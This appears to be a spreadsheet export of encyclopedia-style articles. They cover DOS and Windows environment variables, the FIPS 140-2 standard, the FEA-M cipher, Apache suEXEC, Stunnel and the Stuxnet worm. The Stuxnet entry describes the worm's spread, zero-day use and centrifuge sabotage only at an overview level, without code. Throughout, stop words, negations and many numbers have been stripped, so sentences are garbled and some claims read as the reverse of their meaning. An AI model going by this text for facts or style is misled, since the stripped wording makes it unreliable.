/l:128..1024) support command lines 1024 characters internally ms-dos higher, environment variables expected contain least 1024 characters well. versions dr-dos, environment passed drivers, often need environment installation, shrunken relocated setenv install[high]/loadhigh options (zero environment), /d[:loaddrive] (substitute drive, e.g. b:tsr.com) (relocate environment program) order minimize driver's effectively resulting resident memory footprint.in batch mode, non-existent environment variables replaced zero-length string. standard environment variables reserved environment variables include: %append% (supported since 3.3) this variable contains semicolon-delimited list directories search files. usually changed append command, also ensures directory names converted uppercase. some software actually expects names stored uppercase length list exceed characters, therefore variable best modified command. long filenames containing spaces special characters must quoted (").%config% (supported since ms-dos 6.1, also supported rom-dos) this variable holds symbolic name currently chosen boot configuration. bios (io.sys, ibmbio.com, etc.) name defined corresponding config.sys directive menuitem launching primary command processor. main purpose allow special cases autoexec.bat similar batchjobs depending selected option boot time. this emulated dr-dos utilizing config.sys directive like config=1.%cmdline% (introduced 4dos, also supported since ms-dos 7.0) this variable contains fully expanded text currently executing command line. read applications detect usage retrieve long command lines, since traditional method retrieve command line arguments related functions) limited characters longer available fcbs expanded default used. while 4dos supports longer command lines, command.com still supports maximum characters prompt default (unless overridden /u:128..255 specify size command line buffer), nevertheless internal command lines become longer f.e. variable expansion (depending /l:128..1024 specify size internal buffer). addition command-line length byte psp, command line normally limited ascii-13, command lines longer characters typically truncated ascii-13 inserted position 127, cannot relied upon scenarios. variable suppressed external commands invoked preceding @-symbol like @xcopy backward compatibility order minimize size environment loading non-relocating tsrs. some beta versions windows chicago used %cmdline% store remainder command line excessing characters instead complete command line.%comspec% (supported since 2.0) this variable contains full path command processor, typically c:\command.com c:\dos\command.com. must contain long filenames, dr-dos contain file directory passwords. primary command processor point (typically reflecting settings config.sys directive shell), resident portion command processor reload transient portion disk execution larger programs. value changed runtime reflect changes configuration, would require command processor reload locations. variable also used launching secondary shells.%copycmd% (supported since ms-dos 6.3, also supported rom-dos) allows user specify switch assume "yes" queries) default copy, xcopy, move commands. default overridden supplying switch command line. switch instructs command replace existing files without prompting confirmation.%dircmd% (supported since ms-dos 5.0, also supported rom-dos) allows user specify customized default parameters command, including file specifications. preset default switches overridden providing negative switch command line. example, %dircmd% contains switch, overridden using command line. this similar environment variable %$dir% plus facility define default switches switches dr-dos command.com. %dircmd% also supported external sdir.com/dir.com stacker commands novell higher.%lang% (supported since ms-dos 7.0) this variable supported tools switch locale messages multilingual issues.%langspec% (supported since ms-dos 7.0) this variable supported tools switch locale messages multilingual issues.%no_sep% (supported since dr-dos 7.07) this variable controls display thousands-separators messages various commands. issued default, suppressed specifying no_sep=on no_sep=1 dos. dr-dos additionally allows override system's thousands-separator displayed f.e. no_sep=..%path% (supported since 2.0) this variable contains semicolon-delimited list directories command interpreter search executable files. equivalent unix $path variable (but windows applications also list search data files similar $ld_library_path unix-like systems). usually changed path path ms-dos 6.0) command, also ensures directory names converted uppercase. some software actually expects names stored uppercase length list exceed characters, therefore variable better modified command. long filenames containing spaces special characters must quoted ("). default, current directory searched first, command-line processors like 4dos allow (for "current directory") included list well order override search order; programs incompatible extension.%prompt% (supported since 2.0) this variable contains $-tokenized string defining display prompt. usually changed prompt command.%temp% (and %tmp%) these variables contain path directory temporary files stored. operating system tools typically %temp%, whereas third-party programs also %tmp%. typically %temp% takes precedence %tmp%.the dr-dos family supports number additional standard environment variables including: %beta% this variable contains optional message displayed versions (including 3.41) command.com startup secondary shells.%drdoscfg%/%nwdoscfg%/%opendoscfg% this variable contains directory (without trailing "\") search .ini .cfg configuration files (that dr-dos application specific files like taskmgr.ini, taskmax.ini, viewmax.ini, fastback.cfg etc., class specific files like colors.ini, global files like drdos.ini, nwdos.ini, opendos.ini, dos.ini), used install setup commands various dr-dos programs like diskopt, dosbook, edit, fbx, filelink, lock, security.ovl/nwlogin.exe, serno, taskmax, taskmgr, viewmax, undelete. must contain long filenames.%drcomspec% this variable optionally holds alternative path command processor taking precedence path defined %comspec% variable, optionally including file directory passwords. alternatively, hold special value "on" order enforce usage %comspec% variable even scenarios %comspec% variable point wrong command-line processor, example, running versions dr-dos command foreign operating system.%drsys% setting variable "on" force versions dr-dos command work foreign operating systems instead displaying warning.%fbp_user% specifies user name used fastback command {user}.fb configuration files novell 7.%homedir% this variable contain home directory dr-dos (including 6.0).%info% versions dr-dos command.com variable defines string displayed token prompt command. used, example, inform user exit secondary shells.%loginname% versions dr-dos command.com variable defines user name displayed token prompt command, f.e. login scripts novell netware. also similarly named pseudo-variable %login_name%.%mdos_exec% this variable take values "on" "off" multiuser dos. enabled, operating system permits applications shell secondary shells program area (dpa) freed order maximum memory available secondary applications instead running domain dos.%nochar% this variable used define character displayed commands messages "no" [y,n] queries, thereby overriding current system default (typically english versions dr-dos). contains string, first character, uppercased, taken. some commands also support command line parameter automatically assume "yes" queries, thereby suppressing prompts. however, parameter /y:yn used specify "yes"/"no" characters (thereby overriding %nochar% setting), queries suppressed. also related config.sys directive nochar environment variable %yeschar%.%nosound% setting variable "on" disable default beeps issued dr-dos commands certain situations inform user completion operation, user interaction required, wrong pressed. command line options specifically enable certain beeps override setting.%os% this variable contains name operating system order distinguish different dos-related operating systems digital research-origin batch jobs applications. known values include "dosplus" (dos plus emulation), "cpcdos 4.1" (dos plus cp/m emulation), "drdos" 3.31-6.0, panther, startrek, dr-dos 7.02-7.05), "ezdos" (ez-dos 3.41), "palmdos" "netware palmdos" (palmdos 1.0), "nwdos" (novell "nwdos7" (novell beta), "opendos" (caldera opendos 7.01, caldera dr-opendos 7.02), "cdos" (concurrent dos, concurrent xm), "cpcdos" (concurrent dos), "cdos386" (concurrent 386), "drmdos" multiuser dos), "mdos" (cci multiuser dos), "imsmdos" (ims multiuser dos), "real32" (real/32). ms-dos intersvr looks value "drdos" well. also identically named environment variable %os% later introduced windows family.%pexec% versions dr-dos variable defines command executed token prompt command command.com displays prompt returning external program execution.%switchar% this variable defines switchar used argument parsing dr-dos commands. defined, overrides system's current switchar setting. accepted characters (dos style), (unix style) (cp/m style). also related config.sys directive switchar system's switchar setting) system information variable issues dr-dos command.com retrieve current setting portable batchjobs).%taskmgrwindir% this variable specifies directory, windows system.ini used dr-dos taskmgr multitasker located, overriding default procedure locate file.%ver% this variable contains version operating system order distinguish different versions dr-dos batch jobs display command. also used token prompt command affects value returned system information variable %os_version%. known values include "1.0" (palmdos 1.0), "1.2" (dos plus emulation), "2.0" (concurrent 2.0), "3.0" (concurrent 3.0), "3.31" 3.31), "3.32" 3.32), "3.33" 3.33), "3.34" 3.34), "3.35" 3.35), "3.40" 3.40), "3.41" 3.41, ez-dos 3.41), "3.41t" 3.41t), "4.1" (concurrent 4.1), "5.0" 5.0, multiuser 5.0), "5.1" (novell multiuser 5.1), "6.0" concurrent 6.0, 6.0), "6.2" concurrent 6.2), (novell caldera opendos 7.01, dr-dos 7.02-7.05), "7.00" (cci multiuser 7.00), "7.07" (dr-dos 7.07), "7.1" (ims multiuser 7.1), "7.21" (cci multiuser 7.21), "7.22" (cci multiuser 7.22) etc.%yeschar% this variable used define character displayed commands messages "yes" [y,n] queries, thereby overriding current system default (typically english versions dr-dos). contains string, first character, uppercased, taken. some commands also support command line parameter automatically assume "yes" queries, thereby suppressing prompts. however, parameter /y:y used specify "yes" character (thereby overriding %yeschar% setting), queries suppressed. also related config.sys directive yeschar environment variable %nochar%.%$cls% this variable defines control sequence sent console driver clear screen command issued, thereby overriding internal default ("←[2j" dr-dos, "←e" plus amstrad machines well concurrent dos, multiuser dos, real/32 vt52 terminals, "←+" multiuser ascii terminals). variable defined ansi.sys console driver detected, dr-dos command.com directly clear screen 10h/ah=00h bios function, like ms-dos/pc command.com does. special \nnn-notation octal numbers supported allow definition special characters like (ascii-27 33o), f.e. $cls=\033[2j. send backslash ("\") itself, doubled "\\".%$dir% supported plus accepting values (long) (wide) change default layout directory listings dir. overridden using command line options also similar environment variable %dircmd% options dr-dos command.com.%$page% supported plus accepting values "on" "off" pagination control. setting "on" affect adding commands supporting (like type).%$length% used plus define screen length console lines. this used control portable screen output temporarily halted pressed conjunction option supported various commands automatic pagnination. also related environment variables %$width% %dirsize% well similar pseudo-variable %_rows%.%$width% used plus define screen width console columns. this used control portable formatting screen output commands like type filename. also related environment variables %$length% %dirsize% well similar pseudo-variable %_columns%.%$slice% used plus accepting numerical value control foreground/background time slicing multitasking programs. also plus command slice.%$on% this variable hold optional control sequence switch text highlighting, reversion colorization used emphasize otherwise control display file names commands like type wildcard, example $on=\033[1m ansi.sys loaded $on=\016 esc/p printer. special \nnn octal notation supported, %$cls%. while variable undefined default plus dr-dos, multiuser default ascii terminal equals $on=\033p. also related environment variable %$off%.%$off% this variable hold optional control sequence switch text highlighting, reversion colorization off. used return normal output display file names commands like type wildcard, example $off=\033[0m ansi.sys loaded $off=\024 esc/p printer. special \nnn octal notation supported, %$cls%. while variable undefined default plus dr-dos, multiuser default ascii terminal equals $off=\033q. also related environment variable %$on%.%$header% this variable hold optional control sequence issued output file contents commands like type dr-dos 7.02 higher. used highlighting, pagination formatting, f.e. sending output printer, i.e. $header=\017 esc/p printer. special \nnn octal notation supported, %$cls%. also related environment variable %$footer%.%$footer% this variable hold optional control sequence issued output file contents commands like type dr-dos 7.02 higher. used return normal output format, i.e. $footer=\022\014 printer example above. special \nnn octal notation supported, %$cls%. also related environment variable %$header%.datalight rom-dos supports number additional standard environment variables well including: %dirsize% this variable used define non-standard screen sizes rows[,cols] options (similar %$length% %$width% plus).%newfile% this variable automatically first parameter given config.sys directive newfile.%tz%, %comm%, %sockets%, %http_dir%, %hostname% %ftpdir% also used rom-dos. os/2 %beginlibpath% contains semicolon-separated list directories searched dlls directories given %libpath% variable (which system startup special config.sys directive libpath). possible specify relative directories here, including current working directory. also related environment variable %endlibpath%.%endlibpath% list directories searched dlls like %beginlibpath%, searched list directories %libpath%. windows system path variables refer locations critical operating system resources, generally user-dependent. %appdata% contains full path application data directory logged-in user. does work windows uk.%localappdata% this variable temporary files applications. uses include storing desktop themes, windows error reporting, caching profiles browsers.%comspec%/%comspec% %comspec% variable contains full path command processor; windows family operating systems, cmd.exe, windows %comspec% command.com.%os% %os% variable contains symbolic name operating system family distinguish differing feature sets batchjobs. resembles identically named environment variable %os% found dos-related operating systems digital research-origin like concurrent dos, multiuser dos, real/32, plus, dos, novell opendos. %os% always holds string "windows_nt" windows family.%path% this variable contains semicolon-delimited spaces between) list directories command interpreter search executable file matches given command. environment variables represent paths nested within %path% variable, level indirection. sub-path environment variable contains environment variable representing path, %path% expand properly variable substitution. equivalent unix $path variable.%programfiles%, %programfiles(x86)%, %programw6432% %programfiles% variable points program files directory, stores installed programs windows others. default english-language systems "c:\program files". 64-bit editions windows (xp, 2003, vista), also %programfiles(x86)%, defaults "c:\program files (x86)", %programw6432%, defaults "c:\program files". %programfiles% depends whether process requesting environment variable 32-bit 64-bit (this caused windows-on-windows 64-bit redirection).%commonprogramfiles% this variable points common files directory. default "c:\program files\common files" english version windows.%onedrive% %onedrive% variable special system-wide environment variable found windows derivatives. value path installed setup) onedrive directory located. value %onedrive% cases "c:\users\{username}\onedrive\".%systemdrive% %systemdrive% variable special system-wide environment variable found windows derivatives. value drive upon system directory placed. value %systemdrive% cases "c:".%systemroot% %systemroot% variable special system-wide environment variable found windows family operating systems. value location system directory, including drive path. drive %systemdrive% default path clean installation depends upon version operating system. default: windows newer versions "\windows". windows 2000, "\winnt". windows 3.51 uses "\winnt35". windows terminal server uses "\wtsrv".%windir% this variable points windows directory. windows family operating systems, identical %systemroot% variable). windows 95–98 windows are, default, installed "c:\windows". versions windows, %systemroot% entry above.user management variables store information related resources settings owned various user profiles within system. general rule, variables refer critical system resources locations necessary run. %allusersprofile% (%programdata% since windows vista) this variable expands full path users profile directory. this profile contains resources settings used system accounts. shortcut links copied users\' start menu desktop directories appear every user's start menu desktop, respectively.%userdomain% name workgroup windows domain current user belongs. related variable, %logonserver%, holds hostname server authenticated current user's login credentials (name password). home workgroup, authenticating server usually itself. windows domain, authenticating server domain controller primary domain controller, pdc, windows 4-based domains).%userprofile% special system-wide environment variable found windows derivatives. value location current user's profile directory, found user's hkcu registry hive (ntuser). users also %username% variable determine active users login identification.optional system variables explicitly specified default used modify default behavior certain built-in console commands. these variables also need explicitly specified command line arguments. default values following tables shows typical default values certain environment variables english versions windows retrieved cmd. (some variables also defined running command.com windows, differ certain important details: under command.com, names environment variable always uppercased. some, variables contain short rather long file names. while variables present environment missing, also variables specific command environment.) list, environment variable refers location user's documents directory, standard method setting program's home directory documents directory. pseudo-environment variables command processors windows also support pseudo-environment variables. these values fetched like environment variables, truly stored environment computed requested. besides true environment variables, statically stored environment changed deleted, number pseudo-environment variables exist batch processing. so-called replacement parameters replaceable parameters (microsoft terminology) replacement variables (digital research novell caldera terminology) batch file parameters software terminology) %1..%9 used retrieve calling parameters batchjob, shift. batchjobs, retrieved like environment variables, actually stored environment. some command-line processors (like dr-dos command.com, multiuser mdos.com/tmp.exe (terminal message process), software 4dos, 4os2, 4nt, take command windows cmd.exe) support type pseudo-environment variables named system information variables (novell caldera terminology) internal variables software terminology), used retrieve various possibly dynamic, read-only information running system batch jobs. returned values represent status system moment variables queried; reading multiple times return different values even within command; querying direct effect system. since stored environment, listed exist external programs retrieve. true environment variable name defined, takes precedence corresponding variable environment variable deleted again. they case-sensitive. while almost variables prefixed underscore ("_") 4dos etc. convention (f.e. %_second%), dr-dos command.com (f.e. %os_version%). addition, 4dos, 4os2, 4nt, take command also support called variable functions, including user-definable ones. they work like internal variables, take optional parameters (f.e. %@eval[]%) even change system status depending function. system information variables supported dr-dos command.com: %am_pm% this pseudo-variable returns ante- post-midday status current time. returned string depends locale-specific version dr-dos, f.e. "am" "pm" english version. resembles identically named identifier variable novell netware login scripts.%day% this pseudo-variable returns days current date 2-digit format leading zeros, f.e. "01".."31". also similar pseudo-variable %_day%. resembles identically named identifier variable novell netware login scripts.%day_of_week% this pseudo-variable returns name week 3-character format. returned string depends locale-specific version dr-dos, f.e. "sun", "mon", "tue", "wed", "thu", "fri", "sat" english version. resembles identically named identifier variable novell netware login scripts.%errorlevel% command.com dr-dos 7.02 higher, pseudo-variable returns last error level returned external program return command, f.e. "0".."255". also identically named pseudo-variable %errorlevel% windows errorlevel conditional command.%errorlvl% dr-dos 7.02 higher, pseudo-var</t>
  </si>
  <si>
    <t>FIPS 140-2</t>
  </si>
  <si>
    <t>federal information processing standard publication 140-2, (fips 140-2), u.s. government computer security standard used approve cryptographic modules. title security requirements cryptographic modules. initial publication 2001, last updated december 2002. successor, fips 140-3, approved march 2019, became effective september 2019. fips 140-3 testing began september 2020, although fips 140-3 validation certificates issued yet. fips 140-2 testing still available september 2021 (later changed applications already progress april 2022), creating overlapping transition period year. fips 140-2 test reports remain cmvp queue still granted validations date, fips 140-2 validations moved historical list september 2026 regardless actual final validation date. purpose national institute standards technology (nist) issued fips publication series coordinate requirements standards cryptography modules include hardware software components. protection cryptographic module within security system necessary maintain confidentiality integrity information protected module. this standard specifies security requirements satisfied cryptographic module. standard provides four increasing qualitative levels security intended cover wide range potential applications environments. security requirements cover areas related secure design implementation cryptographic module. these areas include cryptographic module specification; cryptographic module ports interfaces; roles, services, authentication; finite state model; physical security; operational environment; cryptographic management; electromagnetic interference/electromagnetic compatibility (emi/emc); self-tests; design assurance; mitigation attacks.federal agencies departments validate module covered existing fips 140-1 fips 140-2 certificate specifies exact module name, hardware, software, firmware, and/or applet version numbers. cryptographic modules produced private sector open source communities u.s. government regulated industries (such financial health-care institutions) collect, store, transfer, share disseminate sensitive unclassified (sbu) information. commercial cryptographic module also commonly referred hardware security module (hsm). security levels fips 140-2 defines four levels security, simply named "level "level specify detail level security required particular application. level security level provides lowest level security. basic security requirements specified cryptographic module (e.g., least approved algorithm approved security function shall used). specific physical security mechanisms required security level cryptographic module beyond basic requirement production-grade components. example security level cryptographic module personal computer (pc) encryption board. level security level improves upon physical security mechanisms security level cryptographic module requiring features show evidence tampering, including tamper-evident coatings seals must broken attain physical access plaintext cryptographic keys critical security parameters (csps) within module, pick-resistant locks covers doors protect unauthorized physical access. level addition tamper-evident physical security mechanisms required security level security level attempts prevent intruder gaining access csps held within cryptographic module. physical security mechanisms required security level intended high probability detecting responding attempts physical access, modification cryptographic module. physical security mechanisms include strong enclosures tamper-detection/response circuitry zeroes plaintext csps removable covers/doors cryptographic module opened. level security level provides highest level security. security level, physical security mechanisms provide complete envelope protection around cryptographic module intent detecting responding unauthorized attempts physical access. penetration cryptographic module enclosure direction high probability detected, resulting immediate deletion plaintext csps. security level cryptographic modules useful operation physically unprotected environments. security level also protects cryptographic module security compromise environmental conditions fluctuations outside module's normal operating ranges voltage temperature. intentional excursions beyond normal operating ranges used attacker thwart cryptographic module's defenses. cryptographic module required either include special environmental protection features designed detect fluctuations delete csps, undergo rigorous environmental failure testing provide reasonable assurance module affected fluctuations outside normal operating range manner compromise security module. operating platform levels higher, operating platform upon validation applicable also listed. vendors always maintain baseline validations. cryptographic module validation program fips 140-2 establishes cryptographic module validation program (cmvp) joint effort nist communications security establishment (cse) government canada security programs overseen nist focus working government industry establish secure systems networks developing, managing promoting security assessment tools, techniques, services, supporting programs testing, evaluation validation; addresses areas development maintenance security metrics, security evaluation criteria evaluation methodologies, tests test methods; security-specific criteria laboratory accreditation; guidance evaluated tested products; research address assurance methods system-wide security assessment methodologies; security protocol validation activities; appropriate coordination assessment-related activities voluntary industry standards bodies assessment regimes. fips 140-2 testing program fips 140-2 standard information technology security approval program cryptographic modules produced private sector vendors seek products certified government departments regulated industries (such financial health-care institutions) collect, store, transfer, share disseminate sensitive unclassified (sbu) information. tamper evident fips 140-2 security labels utilized deter detect tampering modules. laboratories testing tests cmvp handled third-party laboratories accredited cryptographic module testing laboratories national voluntary laboratory accreditation program(nvlap). vendors interested validation testing select twenty-one accredited labs. nvlap accredited cryptographic modules testing laboratories perform validation testing cryptographic modules. cryptographic modules tested requirements found fips 140–2, security requirements cryptographic modules. security requirements cover areas related design implementation cryptographic module. within areas, cryptographic module receives security level rating (1–4, lowest highest), depending requirements met. areas provide different levels security, cryptographic module receives rating reflects fulfillment requirements area. validation overall rating issued cryptographic module, indicates: minimum independent ratings received areas levels, fulfillment requirements areas.on vendor's validation certificate, individual ratings listed, well overall rating. nist maintains validation lists cryptographic standards testing programs (past present). lists updated modules/implementations receive validation certificates nist cse. items fips 140-1 fips 140-2 validation list reference validated algorithm implementations appear algorithm validation lists. compliance addition using validate cryptographic module, encryption solutions required used cipher suites approved algorithms security functions established fips 140-2 annex considered fips 140-2 compliant. annexes fips 140-2 annexes: annex approved security functions (draft october 2021) annex approved protection profiles (draft june 2019) annex approved random number generators (draft october 2021) annex approved establishment techniques (draft october 2021) reception steven marquess posted criticism fips 140-2 validation lead incentives keep vulnerabilities defects hidden. cmvp decertify software vulnerabilities found, take year re-certify software defects found, companies left without certified product ship. example, steven marquess mentions vulnerability found, publicised, fixed fips-certified open-source derivative openssl, publication meaning openssl derivative decertified. this decertification hurt companies relying openssl-derivative's fips certification. contrast, companies renamed certified copy open-source openssl derivative decertified, even though basically identical, vulnerability. steven marquess therefore argues fips process inadvertently encourages hiding software's origins, de-associate defects since found original, potentially leaving certified copy vulnerable.in recent years, cmvp taken steps avoid situation described marquess, moving validations historical list based algorithms functions contained module, rather based provenance. also common criteria crypto-shredding fips fips 140-3 tamper resistance references external links "fips 140-2" (pdf). nist. december 2002. retrieved march 2017. "fips 140-2 effective 15-nov-2001". nist. 2013. retrieved 2013. "fips validation". mozilla. november 2011. retrieved 2013. "openssl fips 140-2". openssl. february 2013. retrieved 2013. "openfips project". axiomasec.com. retrieved 2013. "general flow fips 140-2 validation testing". jtsec. november 2011. retrieved march 2018.</t>
  </si>
  <si>
    <t>FEA-M</t>
  </si>
  <si>
    <t>cryptography, fea-m (fast encryption algorithm multimedia) block cipher developed 2001 tan, siew, syed. with unusually large block size 4096 bits, fea-m's calculations operate 64×64 binary matrices. unlike block ciphers, fea-m multiple rounds encryption. each block encrypted using multiplications additions. data encrypted using pair session keys chosen message. invertible matrix used encrypt session keys, encrypted session keys must sent along ciphertext. since invertible matrices used key, effective size 4094.2 bits. fea-m insecure; attack found youssef tavares (2003) recovers secret using known plaintext chosen plaintexts. references hongjun feng bao; robert deng (october 2003). efficient known plaintext attack fea-m (pdf). international conference information communication security (icics 2003). huhehaote: springer-verlag. 34–46. retrieved december 2006. further reading mihaljevic, m.j. (november 2003). vulnerabilities improvements fast encryption algorithm multimedia fea-m". ieee transactions consumer electronics. (4): 1199–1207. doi:10.1109/tce.2003.1261217.</t>
  </si>
  <si>
    <t>SuEXEC</t>
  </si>
  <si>
    <t>apache suexec feature apache server. allows users common gateway interface (cgi) server side includes (ssi) applications different user. normally, server processes default server user (often wwwrun, www-data, apache nobody). suexec feature consists module server binary executable acts wrapper. suexec introduced apache often included default apache package provided linux distributions. client requests suexec activated, call suexec binary wraps scripts executes user account server process (virtual host) defined virtual host directive.additionally, suexec perform multi-step check executed ensure security server (including path-checks, limit permitted commands, etc.) example user "alice" website including common gateway interface script files public_html common root directory name) folder, accessed https://example.com/~alice. user "bob" views alice's webpage, requires apache scripts. instead running scripts "wwwrun" (which results need scripts readable executable "wwwrun" group file owned group users otherwise), scripts /home/alice/public_html wrapped using suexec alice's user resulting higher security eliminating need make scripts readable executable users everyone "wwwrun" group (instead alice needs able script). references external links apache.org suexec support (apache 2.4) apache.org suexec support (apache 1.3)</t>
  </si>
  <si>
    <t>Stunnel</t>
  </si>
  <si>
    <t>stunnel open-source multi-platform application used provide universal tls/ssl tunneling service. stunnel used provide secure encrypted connections clients servers speak natively. runs variety operating systems, including unix-like operating systems windows. stunnel relies openssl library implement underlying protocol. stunnel uses public-key cryptography x.509 digital certificates secure connection, clients optionally authenticated certificate.if linked libwrap, configured proxy–firewall service well. stunnel maintained michał trojnara released terms general public license (gpl) openssl exception. example scenario example, could stunnel provide secure connection existing non-ssl-aware smtp mail server. assuming smtp server expects connections port would configure stunnel port non-ssl port mail client connects port 465. network traffic client initially passes stunnel application, transparently encrypts decrypts traffic forwards unsecured traffic port locally. mail server sees non-ssl mail client.the stunnel process could running different server unsecured mail application; however, machines would typically behind firewall secure internal network intruder could make unsecured connection directly port 25). also tunneling protocol references external links official website</t>
  </si>
  <si>
    <t>Stuxnet</t>
  </si>
  <si>
    <t>stuxnet malicious computer worm first uncovered 2010 thought development since least 2005. stuxnet targets supervisory control data acquisition (scada) systems believed responsible causing substantial damage nuclear program iran. although neither country openly admitted responsibility, worm widely understood cyberweapon built jointly united states israel collaborative effort known operation olympic games.stuxnet specifically targets programmable logic controllers (plcs), allow automation electromechanical processes used control machinery industrial processes including centrifuges separating nuclear material. exploiting four zero-day flaws, stuxnet functions targeting machines using microsoft windows operating system networks, seeking siemens step7 software. stuxnet reportedly compromised iranian plcs, collecting information industrial systems causing fast-spinning centrifuges tear apart. stuxnet's design architecture domain-specific could tailored platform attacking modern scada systems (e.g., factory assembly lines power plants), europe, japan, united states. stuxnet reportedly ruined almost one-fifth iran's nuclear centrifuges. targeting industrial control systems, worm infected 200,000 computers caused 1,000 machines physically degrade.stuxnet three modules: worm executes routines related main payload attack; link file automatically executes propagated copies worm; rootkit component responsible hiding malicious files processes, prevent detection stuxnet. typically introduced target environment infected flash drive, thus crossing gap. worm propagates across network, scanning siemens step7 software computers controlling plc. absence either criterion, stuxnet becomes dormant inside computer. conditions fulfilled, stuxnet introduces infected rootkit onto step7 software, modifying code giving unexpected commands returning loop normal operation system values back users. discovery stuxnet, discovered sergey ulasen, initially spread microsoft windows, targeted siemens industrial control systems. while first time hackers targeted industrial systems, first publicly known intentional cyberwarfare implemented, first discovered malware spies subverts industrial systems, first include programmable logic controller (plc) rootkit.the worm initially spreads indiscriminately, includes highly specialized malware payload designed target siemens supervisory control data acquisition (scada) systems configured control monitor specific industrial processes. stuxnet infects plcs subverting step-7 software application used reprogram devices.different variants stuxnet targeted five iranian organizations, probable target widely suspected uranium enrichment infrastructure iran; symantec noted august 2010 infected computers worldwide iran. siemens stated worm caused damage customers, iran nuclear program, uses embargoed siemens equipment procured secretly, damaged stuxnet. kaspersky concluded sophisticated attack could conducted "with nation-state support." f-secure's chief researcher mikko hyppönen, asked possible nation-state support involved, agreed "that's would look like, yes."in 2011, program need know cited statement gary samore, white house coordinator arms control weapons mass destruction, said, "we're glad [the iranians] trouble centrifuge machine u.s. allies everything make sure complicate matters them," offering "winking acknowledgement" united states involvement stuxnet. according daily telegraph, showreel played retirement party head israel defense forces (idf), gabi ashkenazi, included references stuxnet operational successes chief staff.on june 2012, article york times said stuxnet part israeli intelligence operation named operation olympic games, devised president george bush executed president barack obama.on july 2012, article chris matyszczyk cnet reported atomic energy organization iran e-mailed f-secure's chief research officer mikko hyppönen report instance malware. december 2012, iranian semi-official news agency announced cyberattack stuxnet, time industries southern area country. malware targeted power plant industries hormozgan province recent months.according expert eugene kaspersky, worm also infected nuclear power plant russia. kaspersky noted, however, since power plant connected public internet, system remain safe. history worm first identified security company virusblokada mid-june 2010. journalist brian krebs's blog posting july 2010 first widely read report worm. original name given virusblokada "rootkit.tmphider;" symantec however called "w32.temphid," later changing "w32.stuxnet." current name derived combination keywords software (".stub" "mrxnet.sys"). reason discovery time attributed virus accidentally spreading beyond intended target (the natanz plant) programming error introduced update; worm spreading engineer's computer connected centrifuges, spreading engineer returned home connected computer internet.kaspersky experts first estimated stuxnet started spreading around march april 2010, first variant worm appeared june 2009. july 2010, worm's existence became widely known, distributed denial-of-service attack made servers leading mailing lists industrial-systems security. this attack, unknown source likely related stuxnet, disabled lists, thereby interrupting important source information power plants factories. hand, researchers symantec uncovered version stuxnet computer virus used attack iran's nuclear program november 2007, developed early 2005, iran still setting uranium enrichment facility.the second variant, substantial improvements, appeared march 2010, apparently authors believed stuxnet spreading fast enough; third, minor improvements, appeared april 2010. worm contains component build time-stamp february 2010. united kingdom november 2010, news reported received information anonymous source unidentified security organization stuxnet, variation worm, traded black market.in 2015, kaspersky noted equation group used zero-day attacks prior stuxnet, another malware called fanny.bmp. commented "the similar type usage exploits together different computer worms, around time, indicates equation group stuxnet developers either working closely together".in 2019, chronicle researchers juan andres guerrero-saade silas cutler presented evidence least four distinct threat actor malware platforms collaborating create different versions stuxnet. collaboration dubbed 'gossip girl' threat group leaked classified slides included flame. gossip girl cooperative umbrella includes equation group, flame, duqu, flowershop (also known 'cheshire cat').in 2020, researcher facundo muñoz found evidence suggesting equation group collaborated stuxnet developers 2009 lending least zero-day exploit, exploit 2008 actively used in-the-wild conficker computer worm chinese hackers. 2017, group hackers known shadow brokers leaked massive trove tools belonging equation group, including versions exploits compiled 2010, showing significant code overlaps stuxnet's exploits equation group's exploits developed using libraries called "exploit development framework" also leaked shadow brokers. affected countries study spread stuxnet symantec showed main affected countries early days infection iran, indonesia india: iran reported "beefed cyberwar abilities following stuxnet attack, suspected retaliatory attacks united states banks. operation unlike malware, stuxnet little harm computers networks meet specific configuration requirements; "the attackers took great care make sure designated targets marksman's job." while worm promiscuous, makes inert siemens software found infected computers, contains safeguards prevent infected computer spreading worm three others, erase june 2012.for targets, stuxnet contains, among things, code man-in-the-middle attack fakes industrial process control sensor signals infected system shut detected abnormal behavior. such complexity unusual malware. worm consists layered attack three different systems: windows operating system, siemens wincc step7 industrial software applications windows siemens plcs. windows infection stuxnet attacked windows systems using unprecedented four zero-day attacks (plus cplink vulnerability vulnerability used conficker worm). initially spread using infected removable drives flash drives, contain windows shortcut files initiate executable code. worm uses exploits techniques peer-to-peer remote procedure call (rpc) infect update computers inside private networks directly connected internet. number zero-day exploits used unusual, highly valued malware creators typically make (and thus simultaneously make visible) four different zero-day exploits worm. amongst exploits remote code execution computer printer sharing enabled, lnk/pif vulnerability, file execution accomplished icon viewed windows explorer, negating need user interaction. stuxnet unusually large half megabyte size, written several different programming languages (including c++) also irregular malware. windows component malware promiscuous spreads relatively quickly indiscriminately.the malware user mode kernel mode rootkit ability windows, device drivers digitally signed private keys public certificates stolen separate well-known companies, jmicron realtek, located hsinchu science park taiwan. driver signing helped install kernel mode rootkit drivers successfully without users notified, thus remained undetected relatively long period time. both compromised certificates revoked verisign. websites denmark malaysia configured command control servers malware, allowing updated, industrial espionage conducted uploading information. both domain names subsequently redirected service provider dynadot part global effort disable malware. step software infection according researcher ralph langner, installed windows system stuxnet infects project files belonging siemens' wincc/pcs scada control software (step subverts communication library wincc called s7otbxdx.dll. doing intercepts communications wincc software running windows target siemens devices, connected data cable. malware able modify code devices unnoticed, subsequently mask presence wincc control software attempts read infected block memory system.the malware furthermore used zero-day exploit wincc/scada database software form hard-coded database password. infection entirety stuxnet code disclosed, payload targets scada configurations meet criteria programmed identify.stuxnet requires specific slave variable-frequency drives (frequency converter drives) attached targeted siemens s7-300 system associated modules. attacks systems variable-frequency drives specific vendors: vacon based finland fararo paya based iran. furthermore, monitors frequency attached motors, attacks systems spin 1,210 this much higher frequency motors operate industrial applications, notable exception centrifuges. stuxnet installs malware memory block db890 monitors profibus messaging system. when certain criteria met, periodically modifies frequency 1,410 1,064 thus affects operation connected motors changing rotational speed. also installs rootkit first documented case platform hides malware system masks changes rotational speed monitoring systems. removal siemens released detection removal tool stuxnet. siemens recommends contacting customer support infection detected advises installing microsoft updates security vulnerabilities prohibiting third-party flash drives. siemens also advises immediately upgrading password access codes.the worm's ability reprogram external plcs complicate removal procedure. symantec's liam o'murchu warns fixing windows systems fully solve infection; thorough audit plcs necessary. despite speculation incorrect removal worm could cause damage, siemens reports first four months since discovery, malware successfully removed systems customers without adverse effects. control system security prevention control system security incidents, viral infections like stuxnet, topic addressed public private sector. department homeland security national cyber security division (ncsd) operates control system security program (cssp). program operates specialized computer emergency response team called industrial control systems cyber emergency response team (ics-cert), conducts biannual conference 